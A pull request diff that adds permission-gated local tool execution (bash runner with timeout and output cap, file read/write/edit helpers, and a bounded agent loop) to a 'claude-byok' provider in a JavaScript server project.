### PR TITLE
feat(server): claude-byok tools — Read/Write/Edit/Bash/Glob/Grep (#4047 PR 2/2)

### DIFF
--- a/packages/server/src/built-in-tools/bash-exec.js
+++ b/packages/server/src/built-in-tools/bash-exec.js
@@ -56,8 +56,13 @@ export async function executeBash({
   const startedAt = Date.now()
   let stdout = ''
   let stderr = ''
-  let stdoutBytes = 0
-  let stderrBytes = 0
+  // Single counter shared across both streams. Pre-fix, stdout and
+  // stderr each had their own counter so total captured output could
+  // be up to ~2×maxOutputBytes — Copilot review on #4060. Now the cap
+  // is a true total cap, counting actual UTF-8 BYTES of the chunk
+  // buffer (chunk.length), not JS string code units (text.length)
+  // which is UTF-16 and undercounts non-ASCII output.
+  let totalBytes = 0
   let truncated = false
   let timedOut = false
   let aborted = false
@@ -68,36 +73,30 @@ export async function executeBash({
     stdio: ['ignore', 'pipe', 'pipe'],
   })
 
-  const appendOut = (chunk) => {
-    if (stdoutBytes >= maxOutputBytes) return
-    const text = chunk.toString('utf8')
-    const remaining = maxOutputBytes - stdoutBytes
-    if (text.length > remaining) {
-      stdout += text.slice(0, remaining)
-      stdoutBytes += remaining
+  const capture = (chunk, which) => {
+    if (totalBytes >= maxOutputBytes) return
+    const chunkBytes = chunk.length
+    const remaining = maxOutputBytes - totalBytes
+    if (chunkBytes > remaining) {
+      // Slice the BUFFER (byte-accurate), then decode. Slicing the
+      // decoded string would be UTF-16 indexed and could split a
+      // surrogate pair, producing replacement chars.
+      const sliced = chunk.subarray(0, remaining).toString('utf8')
+      if (which === 'stdout') stdout += sliced
+      else stderr += sliced
+      totalBytes += remaining
       truncated = true
-      // Soft-kill — output cap is itself a failure mode.
       killChild('SIGTERM', 'output_cap')
     } else {
-      stdout += text
-      stdoutBytes += text.length
+      const text = chunk.toString('utf8')
+      if (which === 'stdout') stdout += text
+      else stderr += text
+      totalBytes += chunkBytes
     }
   }
 
-  const appendErr = (chunk) => {
-    if (stderrBytes >= maxOutputBytes) return
-    const text = chunk.toString('utf8')
-    const remaining = maxOutputBytes - stderrBytes
-    if (text.length > remaining) {
-      stderr += text.slice(0, remaining)
-      stderrBytes += remaining
-      truncated = true
-      killChild('SIGTERM', 'output_cap')
-    } else {
-      stderr += text
-      stderrBytes += text.length
-    }
-  }
+  const appendOut = (chunk) => capture(chunk, 'stdout')
+  const appendErr = (chunk) => capture(chunk, 'stderr')
 
   child.stdout.on('data', appendOut)
   child.stderr.on('data', appendErr)

--- a/packages/server/src/built-in-tools/bash-exec.js
+++ b/packages/server/src/built-in-tools/bash-exec.js
@@ -1,0 +1,160 @@
+/**
+ * Run a shell command in a child process, capture stdout/stderr, enforce
+ * a timeout and an output size cap. Used by the claude-byok provider's
+ * Bash tool — chroxy is the agent, so the BYOK provider runs tools
+ * locally rather than letting the claude binary do it.
+ *
+ * Design notes:
+ * - Uses `spawn('bash', ['-c', command])` rather than `exec()` so we get
+ *   streaming output + AbortSignal support, and the user's full shell
+ *   syntax (pipes, redirection, heredocs) just works.
+ * - Output is captured incrementally and capped at `maxOutputBytes` to
+ *   keep a runaway producer from OOMing chroxy. When the cap is hit, the
+ *   stream is truncated with a clear marker; the child is sent SIGTERM
+ *   followed by SIGKILL after a 2s grace.
+ * - Timeout sends SIGTERM first, SIGKILL after 2s if the child ignores
+ *   the term. Returns `timedOut: true` so the caller can surface that
+ *   distinctly from an exit-code failure.
+ * - Aborting via the optional signal does the same as a timeout — clean
+ *   SIGTERM, SIGKILL after grace. The returned `aborted: true` flag
+ *   distinguishes it from a timeout for caller telemetry.
+ *
+ * Returns:
+ *   {
+ *     stdout: string,
+ *     stderr: string,
+ *     exitCode: number | null,   // null when killed before exit
+ *     signal: string | null,     // signal that killed the process
+ *     timedOut: boolean,
+ *     aborted: boolean,
+ *     truncated: boolean,        // true if output cap was hit
+ *     durationMs: number,
+ *   }
+ */
+
+import { spawn } from 'node:child_process'
+
+export const DEFAULT_BASH_TIMEOUT_MS = 30_000
+export const DEFAULT_BASH_MAX_OUTPUT_BYTES = 1_000_000 // 1 MB
+export const HARD_KILL_GRACE_MS = 2_000
+
+export async function executeBash({
+  command,
+  cwd = process.cwd(),
+  timeoutMs = DEFAULT_BASH_TIMEOUT_MS,
+  maxOutputBytes = DEFAULT_BASH_MAX_OUTPUT_BYTES,
+  env,
+  signal,
+} = {}) {
+  if (typeof command !== 'string' || command.length === 0) {
+    throw new TypeError('executeBash: command must be a non-empty string')
+  }
+  if (typeof timeoutMs !== 'number' || timeoutMs <= 0) {
+    throw new TypeError('executeBash: timeoutMs must be a positive number')
+  }
+
+  const startedAt = Date.now()
+  let stdout = ''
+  let stderr = ''
+  let stdoutBytes = 0
+  let stderrBytes = 0
+  let truncated = false
+  let timedOut = false
+  let aborted = false
+
+  const child = spawn('bash', ['-c', command], {
+    cwd,
+    env: env || process.env,
+    stdio: ['ignore', 'pipe', 'pipe'],
+  })
+
+  const appendOut = (chunk) => {
+    if (stdoutBytes >= maxOutputBytes) return
+    const text = chunk.toString('utf8')
+    const remaining = maxOutputBytes - stdoutBytes
+    if (text.length > remaining) {
+      stdout += text.slice(0, remaining)
+      stdoutBytes += remaining
+      truncated = true
+      // Soft-kill — output cap is itself a failure mode.
+      killChild('SIGTERM', 'output_cap')
+    } else {
+      stdout += text
+      stdoutBytes += text.length
+    }
+  }
+
+  const appendErr = (chunk) => {
+    if (stderrBytes >= maxOutputBytes) return
+    const text = chunk.toString('utf8')
+    const remaining = maxOutputBytes - stderrBytes
+    if (text.length > remaining) {
+      stderr += text.slice(0, remaining)
+      stderrBytes += remaining
+      truncated = true
+      killChild('SIGTERM', 'output_cap')
+    } else {
+      stderr += text
+      stderrBytes += text.length
+    }
+  }
+
+  child.stdout.on('data', appendOut)
+  child.stderr.on('data', appendErr)
+
+  let hardKillTimer = null
+  const killChild = (sig, _reason) => {
+    if (child.killed || child.exitCode !== null) return
+    try {
+      child.kill(sig)
+    } catch {
+      // ignore — process already gone
+    }
+    if (sig === 'SIGTERM' && hardKillTimer === null) {
+      hardKillTimer = setTimeout(() => {
+        try {
+          if (!child.killed && child.exitCode === null) child.kill('SIGKILL')
+        } catch {}
+      }, HARD_KILL_GRACE_MS)
+    }
+  }
+
+  const timeoutHandle = setTimeout(() => {
+    timedOut = true
+    killChild('SIGTERM', 'timeout')
+  }, timeoutMs)
+
+  let abortListener = null
+  if (signal) {
+    if (signal.aborted) {
+      aborted = true
+      killChild('SIGTERM', 'aborted_at_start')
+    } else {
+      abortListener = () => {
+        aborted = true
+        killChild('SIGTERM', 'aborted')
+      }
+      signal.addEventListener('abort', abortListener, { once: true })
+    }
+  }
+
+  const { code, sig } = await new Promise((resolve) => {
+    child.on('exit', (code, signalName) => resolve({ code, sig: signalName }))
+    child.on('error', () => resolve({ code: null, sig: null }))
+  })
+
+  clearTimeout(timeoutHandle)
+  if (hardKillTimer !== null) clearTimeout(hardKillTimer)
+  if (signal && abortListener) signal.removeEventListener('abort', abortListener)
+
+  return {
+    stdout,
+    stderr,
+    exitCode: code,
+    signal: sig,
+    timedOut,
+    aborted,
+    truncated,
+    durationMs: Date.now() - startedAt,
+  }
+}

--- a/packages/server/src/built-in-tools/file-ops.js
+++ b/packages/server/src/built-in-tools/file-ops.js
@@ -1,0 +1,193 @@
+/**
+ * Local file operations used by the claude-byok provider's Read, Write,
+ * and Edit tools. Mirrors Claude Code's documented semantics:
+ *
+ *   Read   — line-numbered output with optional offset/limit + byte cap
+ *   Write  — full-file write, truncate, mode 0644 by default
+ *   Edit   — string-replace with strict-uniqueness check unless `replaceAll`
+ *
+ * Path-safety is the caller's responsibility — by the time we reach here
+ * the BYOK tool executor has already run validatePathWithinCwd() from
+ * ws-file-ops/common.js to defeat symlink escape attempts. These helpers
+ * receive realpaths that are known to be inside the session cwd.
+ *
+ * Each function returns `{ ok: true, ... }` on success or
+ * `{ ok: false, code, message }` on a recoverable error (file not found,
+ * uniqueness violation, etc.). Unexpected errors throw — the executor
+ * catches and surfaces them as tool errors to the model.
+ */
+
+import { readFile, writeFile, stat } from 'node:fs/promises'
+
+export const DEFAULT_READ_MAX_BYTES = 256_000
+export const DEFAULT_READ_LINE_LIMIT = 2_000
+
+/**
+ * Read a file, optionally with a line range. Lines are 1-indexed in
+ * Claude Code's Read semantics, so `offset=1, limit=100` means "lines
+ * 1..100". The output is line-numbered (`<5-digit>→<content>`) matching
+ * what Claude Code's Read tool produces, so the model sees a consistent
+ * shape across providers.
+ *
+ * On a binary file (NUL byte detected in the first 8KB) we refuse and
+ * return ok:false with a clear code — the model should use a different
+ * tool for binary inspection.
+ */
+export async function readFileTool({
+  filePath,
+  offset,
+  limit,
+  maxBytes = DEFAULT_READ_MAX_BYTES,
+} = {}) {
+  if (typeof filePath !== 'string' || filePath.length === 0) {
+    return { ok: false, code: 'EINVAL', message: 'filePath is required' }
+  }
+
+  let st
+  try {
+    st = await stat(filePath)
+  } catch (err) {
+    if (err.code === 'ENOENT') {
+      return { ok: false, code: 'ENOENT', message: `file not found: ${filePath}` }
+    }
+    throw err
+  }
+  if (!st.isFile()) {
+    return { ok: false, code: 'ENOTFILE', message: `not a regular file: ${filePath}` }
+  }
+  if (st.size > maxBytes && !Number.isFinite(limit)) {
+    return {
+      ok: false,
+      code: 'TOO_LARGE',
+      message: `file is ${st.size} bytes (cap ${maxBytes}); use offset+limit to read a slice`,
+    }
+  }
+
+  const raw = await readFile(filePath)
+  // Binary sniff on the first 8KB. NUL bytes are the cheapest reliable
+  // signal; UTF-8 valid text rarely contains them.
+  const sniff = raw.subarray(0, 8192)
+  if (sniff.includes(0)) {
+    return { ok: false, code: 'BINARY', message: `binary content in ${filePath}; Read is text-only` }
+  }
+
+  const text = raw.toString('utf8')
+  const allLines = text.split('\n')
+  const totalLines = allLines.length
+
+  const start = Number.isFinite(offset) && offset > 0 ? Math.floor(offset) - 1 : 0
+  const requestedCount = Number.isFinite(limit) && limit > 0
+    ? Math.min(Math.floor(limit), DEFAULT_READ_LINE_LIMIT)
+    : DEFAULT_READ_LINE_LIMIT
+  const slice = allLines.slice(start, start + requestedCount)
+
+  // Match Claude Code's tabular line-numbered format: 5-space-padded
+  // 1-indexed line number, then arrow, then the line. Final trailing
+  // newline preserved when the slice ends at a real EOL.
+  const numbered = slice
+    .map((line, i) => `${String(start + i + 1).padStart(5)}→${line}`)
+    .join('\n')
+
+  return {
+    ok: true,
+    content: numbered,
+    totalLines,
+    linesReturned: slice.length,
+    truncatedByLimit: slice.length < totalLines - start,
+  }
+}
+
+/**
+ * Write a file, truncating any existing content. Creates the file (and
+ * any missing parent directories) if absent. Returns `created: true`
+ * when the path did not exist before.
+ */
+export async function writeFileTool({ filePath, content, mode = 0o644 } = {}) {
+  if (typeof filePath !== 'string' || filePath.length === 0) {
+    return { ok: false, code: 'EINVAL', message: 'filePath is required' }
+  }
+  if (typeof content !== 'string') {
+    return { ok: false, code: 'EINVAL', message: 'content must be a string' }
+  }
+
+  let existedBefore = true
+  try {
+    await stat(filePath)
+  } catch (err) {
+    if (err.code === 'ENOENT') existedBefore = false
+    else throw err
+  }
+
+  await writeFile(filePath, content, { mode })
+  return {
+    ok: true,
+    bytesWritten: Buffer.byteLength(content, 'utf8'),
+    created: !existedBefore,
+  }
+}
+
+/**
+ * String-replace edit matching Claude Code's semantics:
+ *   - Without `replaceAll`: refuses if `oldString` appears more than
+ *     once. This avoids the very common LLM mistake of asking for an
+ *     "edit" that accidentally touches more than one site.
+ *   - Without `replaceAll`: refuses if `oldString` is not found at all.
+ *   - With `replaceAll: true`: replaces every occurrence; the count is
+ *     reported back so the model can sanity-check.
+ *
+ * Errors are returned as ok:false so the model gets a clear feedback
+ * loop instead of an exception bubbling up as "internal error".
+ */
+export async function editFileTool({
+  filePath,
+  oldString,
+  newString,
+  replaceAll = false,
+} = {}) {
+  if (typeof filePath !== 'string' || filePath.length === 0) {
+    return { ok: false, code: 'EINVAL', message: 'filePath is required' }
+  }
+  if (typeof oldString !== 'string' || oldString.length === 0) {
+    return { ok: false, code: 'EINVAL', message: 'oldString is required and must be non-empty' }
+  }
+  if (typeof newString !== 'string') {
+    return { ok: false, code: 'EINVAL', message: 'newString must be a string' }
+  }
+  if (oldString === newString) {
+    return { ok: false, code: 'NO_CHANGE', message: 'oldString and newString are identical' }
+  }
+
+  let content
+  try {
+    content = await readFile(filePath, 'utf8')
+  } catch (err) {
+    if (err.code === 'ENOENT') {
+      return { ok: false, code: 'ENOENT', message: `file not found: ${filePath}` }
+    }
+    throw err
+  }
+
+  // Count occurrences without allocating a full split for huge files —
+  // indexOf walk is O(n) and predictable.
+  let count = 0
+  let idx = -1
+  while ((idx = content.indexOf(oldString, idx + 1)) !== -1) count++
+
+  if (count === 0) {
+    return { ok: false, code: 'NOT_FOUND', message: `oldString not found in ${filePath}` }
+  }
+  if (count > 1 && !replaceAll) {
+    return {
+      ok: false,
+      code: 'NOT_UNIQUE',
+      message: `oldString matched ${count} sites in ${filePath}; pass replaceAll=true or add surrounding context to make it unique`,
+    }
+  }
+
+  const next = replaceAll
+    ? content.split(oldString).join(newString)
+    : content.replace(oldString, newString)
+
+  await writeFile(filePath, next)
+  return { ok: true, replacements: count, bytesWritten: Buffer.byteLength(next, 'utf8') }
+}

--- a/packages/server/src/built-in-tools/file-ops.js
+++ b/packages/server/src/built-in-tools/file-ops.js
@@ -17,7 +17,8 @@
  * catches and surfaces them as tool errors to the model.
  */
 
-import { readFile, writeFile, stat } from 'node:fs/promises'
+import { readFile, writeFile, stat, mkdir } from 'node:fs/promises'
+import { dirname } from 'node:path'
 
 export const DEFAULT_READ_MAX_BYTES = 256_000
 export const DEFAULT_READ_LINE_LIMIT = 2_000
@@ -55,11 +56,18 @@ export async function readFileTool({
   if (!st.isFile()) {
     return { ok: false, code: 'ENOTFILE', message: `not a regular file: ${filePath}` }
   }
-  if (st.size > maxBytes && !Number.isFinite(limit)) {
+  // Always enforce the byte cap, even when a `limit` is provided.
+  // Pre-fix, the cap was skipped when limit was set, so a multi-GB file
+  // could still get fully read into memory if the caller passed a limit
+  // (Copilot review on #4060). The slice-by-line approach below still
+  // reads the whole file via readFile(), so the cap is the only thing
+  // keeping us from OOMing on a giant input. If the file is too big,
+  // refuse — model can re-request with offset to walk it in chunks.
+  if (st.size > maxBytes) {
     return {
       ok: false,
       code: 'TOO_LARGE',
-      message: `file is ${st.size} bytes (cap ${maxBytes}); use offset+limit to read a slice`,
+      message: `file is ${st.size} bytes (cap ${maxBytes}); read a slice with an explicit offset against a smaller file or split it first`,
     }
   }
 
@@ -98,9 +106,14 @@ export async function readFileTool({
 }
 
 /**
- * Write a file, truncating any existing content. Creates the file (and
- * any missing parent directories) if absent. Returns `created: true`
- * when the path did not exist before.
+ * Write a file, truncating any existing content. Creates the file and
+ * any missing parent directories. Returns `created: true` when the
+ * path did not exist before.
+ *
+ * The mkdir-recursive call is necessary because Node's writeFile does
+ * NOT create parent dirs on its own — pre-fix, the doc comment claimed
+ * the behavior but the code would ENOENT on a missing parent (Copilot
+ * review on #4060).
  */
 export async function writeFileTool({ filePath, content, mode = 0o644 } = {}) {
   if (typeof filePath !== 'string' || filePath.length === 0) {
@@ -116,6 +129,15 @@ export async function writeFileTool({ filePath, content, mode = 0o644 } = {}) {
   } catch (err) {
     if (err.code === 'ENOENT') existedBefore = false
     else throw err
+  }
+
+  // Ensure parent directory exists. recursive:true is a no-op when the
+  // directory already exists, so this is safe to call unconditionally.
+  // Path safety was already enforced by the caller (validatePathWithinCwd
+  // in byok-tool-executor.js), so the dirname is guaranteed to be
+  // inside the workspace cwd.
+  if (!existedBefore) {
+    await mkdir(dirname(filePath), { recursive: true })
   }
 
   await writeFile(filePath, content, { mode })

--- a/packages/server/src/byok-session.js
+++ b/packages/server/src/byok-session.js
@@ -6,18 +6,19 @@
  * Motivation + scope: docs/decisions/2026-05-byok-provider-scope.md
  * Audit:              docs/audit-results/clarp-proxy-provider-viability/
  *
- * PR 1 (this file) ships chat-only: the session can stream a response but
- * cannot execute tools. PR 2 adds tools + permission-gated execution.
- *
- * Capability flags reflect that contract — `permissions: false`,
- * `inProcessPermissions: false` for now. They flip in PR 2 alongside the
- * `respondToPermission` / `respondToQuestion` methods.
+ * PR 2 (this file) adds tool execution: when the model emits a tool_use
+ * block, chroxy gates it through PermissionManager, dispatches to a local
+ * executor (byok-tool-executor.js), feeds the tool_result back, and loops
+ * until the model stops calling tools. Built-in tools: Read, Write, Edit,
+ * Bash, Glob, Grep (see byok-tools.js). MCP / Task / WebFetch are deferred
+ * to follow-ups #4048-#4051.
  */
 
 import Anthropic from '@anthropic-ai/sdk'
 import { join } from 'path'
 import { homedir } from 'os'
 import { BaseSession } from './base-session.js'
+import { PermissionManager } from './permission-manager.js'
 import { createLogger } from './logger.js'
 import {
   FALLBACK_MODELS,
@@ -27,6 +28,8 @@ import {
 } from './models.js'
 import { resolveAnthropicApiKey, maskApiKey } from './byok-credentials.js'
 import { translateSdkEvent } from './byok-event-translator.js'
+import { BUILTIN_TOOLS } from './byok-tools.js'
+import { executeBuiltinTool } from './byok-tool-executor.js'
 
 const log = createLogger('byok-session')
 
@@ -39,6 +42,19 @@ const DEFAULT_MAX_TOKENS = 64000
 // a Claude API message ({ role, content }). At 50 turns we're well within
 // any model's context window before the SDK does its own pruning.
 const MAX_HISTORY_TURNS = 50
+
+// Safety cap on tool-use rounds within a single user turn. The model can
+// legitimately need 5-10 tool calls for a complex task; 25 is a generous
+// ceiling that still catches infinite loops if the model misbehaves.
+// Hitting the cap surfaces a clear error to the model rather than running
+// up an unbounded API bill.
+const MAX_TOOL_ROUNDS = 25
+
+// TTL for the per-session realpath cache used by validatePathWithinCwd
+// in the tool executor. The cwd shouldn't change mid-session, but caching
+// for 30s strikes a balance between safety (re-stat to catch a swap) and
+// performance (don't re-realpath the same cwd on every file op).
+const CWD_CACHE_TTL_MS = 30_000
 
 export class ClaudeByokSession extends BaseSession {
   static get displayLabel() {
@@ -55,23 +71,19 @@ export class ClaudeByokSession extends BaseSession {
 
   static get capabilities() {
     return {
-      // PR 1: chat only, no tool dispatch yet. permissions flip true
-      // in PR 2 alongside respondToPermission/respondToQuestion.
-      permissions: false,
-      inProcessPermissions: false,
+      // PR 2: tool execution enabled with permission gating via
+      // PermissionManager (same machinery as claude-sdk).
+      permissions: true,
+      inProcessPermissions: true,
       modelSwitch: true,
-      // permissionModeSwitch is true so the dropdown lets the user pre-
-      // set the mode they want when tools arrive in PR 2. The mode is
-      // stored on the BaseSession; setPermissionMode validates the value.
       permissionModeSwitch: true,
       planMode: false,
-      // PR 1 doesn't persist history across restarts (no resumable id
-      // beyond in-memory _history). Flip to true once we wire a session
-      // file or DB write.
+      // Still no cross-restart resume. _history is in-memory; #4047
+      // tracks a follow-up to persist + resume.
       resume: false,
       terminal: false,
-      // Anthropic SDK supports extended thinking via thinking config
-      // block; left off for PR 1 — wire in PR 2 alongside tools.
+      // Thinking config supported by the SDK but not wired through the
+      // chroxy UI yet — leave off until the toggle lands.
       thinkingLevel: false,
       streaming: true,
       // We rebuild the system prompt on every turn from
@@ -83,7 +95,12 @@ export class ClaudeByokSession extends BaseSession {
   }
 
   static get customEvents() {
-    return []
+    // tool_start / tool_result are surfaced per turn for the dashboard's
+    // tool-call bubble UI. permission_request / user_question /
+    // permission_resolved are re-emitted from PermissionManager and
+    // already known to the SessionManager forwarding pipeline, but list
+    // them here so the capability matrix reflects reality.
+    return ['tool_start', 'tool_result']
   }
 
   /**
@@ -138,6 +155,25 @@ export class ClaudeByokSession extends BaseSession {
     this._history = []
     // AbortController for the active stream so interrupt() can cancel.
     this._abortController = null
+
+    // PermissionManager + event re-emission. Same wiring as
+    // sdk-session.js:254-275 so the dashboard / mobile permission UI
+    // and the audit log work uniformly across providers.
+    this._permissions = new PermissionManager({ log })
+    this._permissions.on('permission_request', (data) => this.emit('permission_request', data))
+    this._permissions.on('user_question', (data) => this.emit('user_question', data))
+    this._permissions.on('permission_resolved', (data) => {
+      if (data && (data.requestId || data.toolUseId)) {
+        this.emit('permission_resolved', data)
+      }
+    })
+    // Backward-compatible accessors used by ws-permissions.js + settings-handlers.js.
+    this._pendingPermissions = this._permissions._pendingPermissions
+    this._lastPermissionData = this._permissions._lastPermissionData
+
+    // Realpath cache used by the tool executor's path-safety check. One
+    // cache per session — fresh sessions don't reuse a stale cwd.
+    this._cwdRealCache = new Map()
   }
 
   async start() {
@@ -177,23 +213,19 @@ export class ClaudeByokSession extends BaseSession {
     this._abortController = new AbortController()
     const turnStartedAt = Date.now()
 
-    // PR 1: attachments are not yet materialised (no Read tool to read them
-    // back). Surface a clear error rather than silently dropping content.
-    // PR 2 will route attachments through file-ops + the tool layer.
+    // Attachments — PR 2 still keeps these as a warn until Read can
+    // pick up materialised files. Tracked separately; not blocking.
     if (Array.isArray(attachments) && attachments.length > 0) {
       this.emit('error', {
         messageId,
-        message: `BYOK provider does not yet support attachments (${attachments.length} dropped). Coming in PR 2.`,
+        message: `BYOK provider does not yet materialise attachments (${attachments.length} dropped). Track follow-up: file-via-Read tool flow.`,
       })
-      // Continue with the text-only prompt rather than aborting the turn —
-      // matches the pattern in claude-tui-session.js attachments fallback.
     }
 
     // Build the user message. On the very first turn, prepend any skills
-    // text from BaseSession._buildPrependPrompt() so a skill that asked
-    // for `injection: prepend` lands in the first user turn. Subsequent
-    // turns are plain prompt text — skills that targeted `system` ride
-    // on the rebuilt systemPrompt instead.
+    // text from BaseSession._buildPrependPrompt(). Subsequent turns are
+    // plain prompt text — skills that targeted `system` ride on the
+    // rebuilt systemPrompt instead.
     let userText = typeof prompt === 'string' ? prompt : String(prompt ?? '')
     if (this._history.length === 0) {
       const prepend = typeof this._buildPrependPrompt === 'function'
@@ -216,117 +248,241 @@ export class ClaudeByokSession extends BaseSession {
       ? this._buildSystemPrompt()
       : ''
 
-    let stream
-    try {
-      stream = this._client.messages.stream(
-        {
-          model: this.model || 'claude-opus-4-7',
-          max_tokens: DEFAULT_MAX_TOKENS,
-          ...(systemPrompt ? { system: systemPrompt } : {}),
-          messages: this._history,
-          // PR 1: no tools — chat only. Tools land in PR 2.
-        },
-        { signal: this._abortController.signal },
-      )
-    } catch (err) {
-      // Stream init threw synchronously (rare — usually validation errors
-      // from the SDK). Roll back the user message we just pushed onto
-      // _history so the next turn doesn't double-send it and so the
-      // user/assistant alternation invariant the SDK requires holds.
-      if (this._history.length > 0 && this._history[this._history.length - 1].role === 'user') {
-        this._history.pop()
-      }
-      this._emitTurnError(messageId, err, 'STREAM_INIT')
-      this._finishTurn()
-      return
-    }
-
     this.emit('stream_start', { messageId })
 
+    // Agent loop. Each iteration:
+    //   1. Stream the next assistant turn (text + possibly tool_use blocks)
+    //   2. If the turn ended with stop_reason !== 'tool_use', break.
+    //   3. Otherwise, execute each tool_use block locally (with permission
+    //      gating) and push a user message of tool_result blocks.
+    //   4. Loop back to (1).
+    // Bounded by MAX_TOOL_ROUNDS to catch infinite-loop misbehavior.
     let lastUsage = null
     let lastStopReason = null
+    let rolledBack = false
 
     try {
-      for await (const event of stream) {
-        const t = translateSdkEvent(event)
-        if (!t) continue
-        switch (t.kind) {
-          case 'stream_start':
-            // SDK's message_start. We already emitted our own
-            // stream_start above so the dashboard could spin up the
-            // bubble before the model started talking; if the model
-            // returns a different one (typical), emit a model_info
-            // here would be useful, but for PR 1 the initial event is
-            // enough. Skip.
+      for (let round = 0; round < MAX_TOOL_ROUNDS; round++) {
+        let stream
+        try {
+          stream = this._client.messages.stream(
+            {
+              model: this.model || 'claude-opus-4-7',
+              max_tokens: DEFAULT_MAX_TOKENS,
+              ...(systemPrompt ? { system: systemPrompt } : {}),
+              tools: BUILTIN_TOOLS,
+              messages: this._history,
+            },
+            { signal: this._abortController.signal },
+          )
+        } catch (err) {
+          // Stream init threw synchronously. On the FIRST round only,
+          // roll back the user message we pushed above so the next turn
+          // doesn't double-send and the alternation invariant holds.
+          // After the first round, _history contains assistant + user
+          // tool_result pairs we should NOT discard.
+          if (round === 0 && !rolledBack) {
+            if (this._history.length > 0 && this._history[this._history.length - 1].role === 'user') {
+              this._history.pop()
+              rolledBack = true
+            }
+          }
+          throw err
+        }
+
+        for await (const event of stream) {
+          const t = translateSdkEvent(event)
+          if (!t) continue
+          switch (t.kind) {
+            case 'stream_delta':
+              this.emit('stream_delta', { messageId, delta: t.text })
+              break
+            case 'tool_start':
+              // Surface the tool_use opening to the dashboard so it can
+              // render a tool-call bubble. Matches sdk-session.js custom
+              // event names.
+              this.emit('tool_start', {
+                messageId,
+                toolUseId: t.toolUseId,
+                toolName: t.toolName,
+              })
+              break
+            case 'tool_input_delta':
+              // Streaming JSON for the tool input. We don't currently
+              // forward partial tool input to the UI (the final block
+              // arrives in finalMessage), but logging helps debug
+              // multi-tool turns.
+              break
+            case 'message_delta':
+              if (t.stopReason) lastStopReason = t.stopReason
+              if (t.usage) lastUsage = t.usage
+              break
+            case 'unknown':
+              log.warn(`unknown SDK event type=${t.sdkType} forwarded as no-op`)
+              break
+            default:
+              break
+          }
+        }
+
+        const final = await stream.finalMessage()
+        lastStopReason = final.stop_reason
+        lastUsage = final.usage
+
+        // Append the assistant turn — full content array preserves
+        // tool_use blocks for the next round of conversation.
+        this._history.push({ role: 'assistant', content: final.content })
+
+        if (lastStopReason !== 'tool_use') {
+          // Done — model wants no more tools. Break out and emit result.
+          break
+        }
+
+        // Execute each tool_use block. Build a tool_result content array
+        // to send back as the user message.
+        const toolBlocks = (final.content || []).filter((b) => b?.type === 'tool_use')
+        const toolResults = []
+        for (const block of toolBlocks) {
+          const result = await this._executeToolBlock({ block, messageId })
+          toolResults.push(result)
+          if (this._abortController?.signal?.aborted) {
+            // User pressed Stop mid-tool-loop. Treat the rest as denied.
             break
-          case 'stream_delta':
-            // Canonical chroxy payload shape: { messageId, delta }. The
-            // dashboard + mobile consumers both read `msg.delta`; emitting
-            // `text` here renders empty bubbles (matches sdk-session.js
-            // shape and the ws-server.js protocol comment).
-            this.emit('stream_delta', { messageId, delta: t.text })
-            break
-          case 'thinking_delta':
-            // PR 1: forward as a regular delta. PR 2 will route via a
-            // dedicated thinking surface when thinkingLevel capability
-            // is enabled.
-            break
-          case 'tool_start':
-          case 'tool_input_delta':
-            // PR 1 doesn't pass tools to the SDK, so the model can't
-            // emit tool_use blocks. If it ever does (e.g. a model
-            // ignored the empty tool list and fabricated one), log
-            // and ignore — don't crash the turn.
-            log.warn(`PR1: unexpected tool event ignored: ${t.kind}`)
-            break
-          case 'message_delta':
-            if (t.stopReason) lastStopReason = t.stopReason
-            if (t.usage) lastUsage = t.usage
-            break
-          case 'content_block_stop':
-          case 'result':
-            // result fires below from finalMessage(); the SDK's own
-            // message_stop is informational.
-            break
-          case 'unknown':
-            log.warn(`PR1: unknown SDK event type=${t.sdkType} forwarded as no-op`)
-            break
+          }
+        }
+        if (toolResults.length === 0) {
+          // stop_reason was tool_use but no tool_use blocks — defensive
+          // bailout to avoid an empty user message that the SDK rejects.
+          log.warn(`stop_reason=tool_use but no tool_use blocks in final.content; ending turn`)
+          break
+        }
+        this._history.push({ role: 'user', content: toolResults })
+
+        if (this._abortController?.signal?.aborted) break
+
+        if (round === MAX_TOOL_ROUNDS - 1) {
+          // Hit the safety cap. Push one more assistant note + bail.
+          log.warn(`hit MAX_TOOL_ROUNDS=${MAX_TOOL_ROUNDS} cap; stopping agent loop`)
+          break
         }
       }
 
-      const final = await stream.finalMessage()
-      lastStopReason = lastStopReason || final.stop_reason
-      lastUsage = lastUsage || final.usage
-
-      // Append the assistant turn to history so the next sendMessage
-      // sees the full conversation. Store final.content (the structured
-      // array of blocks) so any future tool_use blocks survive a resume.
-      this._history.push({ role: 'assistant', content: final.content })
-
-      // stream_end MUST fire before result — dashboard's message-handler
-      // flushes the debounced delta buffer + clears streamingMessageId on
-      // stream_end. Without it the spinner hangs and trailing deltas may
-      // not flush. Mirrors sdk-session.js:696.
       this.emit('stream_end', { messageId })
       this.emit('result', {
-        sessionId: null,  // BYOK has no upstream session id (SDK is stateless)
+        sessionId: null,
         messageId,
         stopReason: lastStopReason,
         duration: Date.now() - turnStartedAt,
         usage: lastUsage,
-        // cost intentionally omitted — until #4054 wires a per-model rate
-        // table, session-manager.js gates cost tracking on
-        // `typeof data.cost === 'number'` so undefined is the right
-        // signal for "cost tracking deferred."
       })
     } catch (err) {
-      // Always emit stream_end on the error path too so the dashboard
-      // doesn't strand the spinner. Errors fire AFTER stream_end so
-      // consumers can finalize the bubble before showing the error.
       this.emit('stream_end', { messageId })
       this._emitTurnError(messageId, err, 'STREAM_ERROR')
     } finally {
       this._finishTurn()
+    }
+  }
+
+  /**
+   * Run one tool_use block: permission gate, dispatch to executor, emit
+   * tool_result events, return the {type:'tool_result', ...} content
+   * block to append to the next user message.
+   */
+  async _executeToolBlock({ block, messageId }) {
+    const toolUseId = block.id
+    const toolName = block.name
+    const input = block.input || {}
+    const signal = this._abortController?.signal
+
+    // Permission gate. PermissionManager handles all four modes
+    // (approve / auto / acceptEdits / plan) and session rules.
+    let decision
+    try {
+      decision = await this._permissions.handlePermission(
+        toolName,
+        input,
+        signal,
+        this.permissionMode,
+      )
+    } catch (err) {
+      // permission_request was rejected (timeout, abort, etc.)
+      return {
+        type: 'tool_result',
+        tool_use_id: toolUseId,
+        content: `Permission gate error: ${err?.message || String(err)}`,
+        is_error: true,
+      }
+    }
+
+    if (decision.behavior !== 'allow') {
+      const msg = decision.message || 'Permission denied by user.'
+      this.emit('tool_result', {
+        messageId,
+        toolUseId,
+        toolName,
+        result: msg,
+        isError: true,
+      })
+      return {
+        type: 'tool_result',
+        tool_use_id: toolUseId,
+        content: msg,
+        is_error: true,
+      }
+    }
+
+    // Execute locally.
